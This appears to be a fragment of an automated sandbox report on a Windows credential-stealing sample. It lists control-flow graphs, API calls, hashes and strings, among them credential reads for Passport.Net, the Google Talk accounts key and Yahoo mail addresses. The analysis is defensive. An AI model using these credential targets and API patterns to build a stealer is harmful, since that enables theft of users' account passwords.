                                      • API String ID: 2012582556-3916222277
                                      • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                      • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                      APIs
                                      • memset.MSVCRT ref: 004037EB
                                      • memset.MSVCRT ref: 004037FF
                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                        • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                      • strchr.MSVCRT ref: 0040386E
                                      • _mbscpy.MSVCRT ref: 0040388B
                                      • strlen.MSVCRT ref: 00403897
                                      • sprintf.MSVCRT ref: 004038B7
                                      • _mbscpy.MSVCRT ref: 004038CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                      • String ID: %s@yahoo.com
                                      • API String ID: 317221925-3288273942
                                      • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                      • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                      APIs
                                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                      • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadMessageProc
                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                      • API String ID: 2780580303-317687271
                                      • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                      • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                      • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                      • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                      APIs
                                      • memset.MSVCRT ref: 00403504
                                      • memset.MSVCRT ref: 0040351A
                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                      • _mbscpy.MSVCRT ref: 00403555
                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                      • _mbscat.MSVCRT ref: 0040356D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                      • API String ID: 3071782539-966475738
                                      • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                      • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 374 40f6e2-40f70a call 40466b call 4045db 379 40f710-40f717 call 404734 374->379 380 40f7e9-40f801 call 404656 call 404785 374->380 379->380 385 40f71d-40f72e CredReadA 379->385 385->380 387 40f734-40f73a 385->387 389 40f740-40f743 387->389 390 40f7e5 387->390 389->390 391 40f749-40f759 389->391 390->380 392 40f75a-40f770 391->392 392->392 393 40f772-40f795 call 4047a5 392->393 396 40f7e2 393->396 397 40f797-40f7b6 WideCharToMultiByte 393->397 396->390 398 40f7b8-40f7c6 strlen 397->398 399 40f7d9-40f7dc LocalFree 397->399 398->399 400 40f7c8-40f7d8 _mbscpy 398->400 399->396 400->399
                                      APIs
                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                      • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                      • strlen.MSVCRT ref: 0040F7BE
                                      • _mbscpy.MSVCRT ref: 0040F7CF
                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                      • String ID: Passport.Net\*
                                      • API String ID: 4000595657-3671122194
                                      • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                      • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 401 40ccd7-40cd06 ??2@YAPAXI@Z 402 40cd08-40cd0d 401->402 403 40cd0f 401->403 404 40cd11-40cd24 ??2@YAPAXI@Z 402->404 403->404 405 40cd26-40cd2d call 404025 404->405 406 40cd2f 404->406 408 40cd31-40cd57 405->408 406->408 410 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 408->410 411 40cd59-40cd60 DeleteObject 408->411 411->410
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                      • String ID:
                                      • API String ID: 2054149589-0
                                      • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                      • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                      • memset.MSVCRT ref: 00408620
                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                      • memset.MSVCRT ref: 00408671
                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                      Strings
                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                      • String ID: Software\Google\Google Talk\Accounts
                                      • API String ID: 1366857005-1079885057
                                      • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                      • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 441 40ba28-40ba3a 442 40ba87-40ba9b call 406c62 441->442 443 40ba3c-40ba52 call 407e20 _mbsicmp 441->443 465 40ba9d call 4107f1 442->465 466 40ba9d call 404734 442->466 467 40ba9d call 404785 442->467 468 40ba9d call 403c16 442->468 469 40ba9d call 410a9c 442->469 448 40ba54-40ba6d call 407e20 443->448 449 40ba7b-40ba85 443->449 454 40ba74 448->454 455 40ba6f-40ba72 448->455 449->442 449->443 450 40baa0-40bab3 call 407e30 458 40bab5-40bac1 450->458 459 40bafa-40bb09 SetCursor 450->459 457 40ba75-40ba76 call 40b5e5 454->457 455->457 457->449 461 40bac3-40bace 458->461 462 40bad8-40baf7 qsort 458->462 461->462 462->459 465->450 466->450 467->450 468->450 469->450
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Cursor_mbsicmpqsort
                                      • String ID: /nosort$/sort
                                      • API String ID: 882979914-1578091866
                                      • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                      • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                      APIs
                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                      • memset.MSVCRT ref: 00410E10
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                      • _mbscpy.MSVCRT ref: 00410E87
                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                      • API String ID: 889583718-2036018995
                                      • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                      • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                      APIs
                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID:
                                      • API String ID: 3473537107-0
                                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                      APIs
                                      • memset.MSVCRT ref: 004109F7
                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                        • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                      • memset.MSVCRT ref: 00410A32
                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                      • String ID:
                                      • API String ID: 3143880245-0
                                      • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                      • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@
                                      • String ID:
                                      • API String ID: 1033339047-0
                                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@mallocmemcpy
                                      • String ID:
                                      • API String ID: 3831604043-0
                                      • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                      • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                      APIs
                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CreateFontIndirect_mbscpymemset
                                      • String ID: Arial
                                      • API String ID: 3853255127-493054409
                                      • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                      • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                      APIs
                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: strlen$_strcmpimemset
                                      • String ID: /stext
                                      • API String ID: 520177685-3817206916
                                      • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                      • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                      APIs
                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                      APIs
                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID:
                                      • API String ID: 145871493-0
                                      • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                      • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                      APIs
                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                      • String ID:
                                      • API String ID: 4165544737-0
                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                      APIs
                                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
